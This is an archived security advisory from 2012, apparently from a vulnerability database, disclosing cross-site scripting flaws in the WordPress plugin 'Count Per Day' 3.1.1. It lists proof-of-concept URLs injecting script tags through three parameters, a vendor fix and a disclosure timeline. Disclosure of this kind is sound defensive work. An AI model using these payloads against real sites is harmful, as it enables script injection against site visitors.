WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities

2012-07-23T00:00:00

Description

Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-015 Author: Stefan Schurtz Affected Software: Successfully tested on 'Count Per Day' 3.1.1 Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day Vendor Status: fixed ========================== Vulnerability Description ========================== The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script> ========= Solution ========= Upgrade to the latest version 3.2 ==================== Disclosure Timeline ==================== 29-Jun-2012 - vendor informed (contact form) 02-Jul-2012 - verified by Meistar 03-Jul-2012 - feedback from developer 14-Jul-2012 - fixed by developer ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://wordpress.org/extend/plugins/count-per-day/changelog/ http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt

{"id": "SECURITYVULNS:DOC:28330", "bulletinFamily": "software", "title": "WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities", "description": "Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities\r\nAdvisory ID: SSCHADV2012-015\r\nAuthor: Stefan Schurtz\r\nAffected Software: Successfully tested on 'Count Per Day' 3.1.1\r\nVendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day\r\nVendor Status: fixed\r\n\r\n==========================\r\nVulnerability Description\r\n==========================\r\n\r\nThe WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities\r\n\r\n==================\r\nPoC-Exploit\r\n==================\r\n\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script>\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>\r\n\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script>\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>\r\n\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script>\r\nhttp://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>\r\n\r\n=========\r\nSolution\r\n=========\r\n\r\nUpgrade to the latest version 3.2\r\n\r\n====================\r\nDisclosure Timeline\r\n====================\r\n\r\n29-Jun-2012 - vendor informed (contact form)\r\n02-Jul-2012 - verified by Meistar\r\n03-Jul-2012 - feedback from developer\r\n14-Jul-2012 - fixed by developer\r\n \r\n========\r\nCredits\r\n========\r\n\r\nVulnerabilities found and advisory written by Stefan Schurtz.\r\n\r\n===========\r\nReferences\r\n===========\r\n\r\nhttp://wordpress.org/extend/plugins/count-per-day/changelog/\r\nhttp://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt\r\n", "published": "2012-07-23T00:00:00", "modified": "2012-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28330", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:45", "edition": 1, "viewCount": 33, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12490"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12490"]}]}, "exploitation": null, "vulnersScore": -0.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645510756, "score": 1659803227}, "_internal": {"score_hash": "05f343d4b980ddf39e12dd58f91e414f"}}

WordPress Plugin &#39;Count Per Day&#39; 3.1.1 Multiple Cross-site scripting vulnerabilities

Description

WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities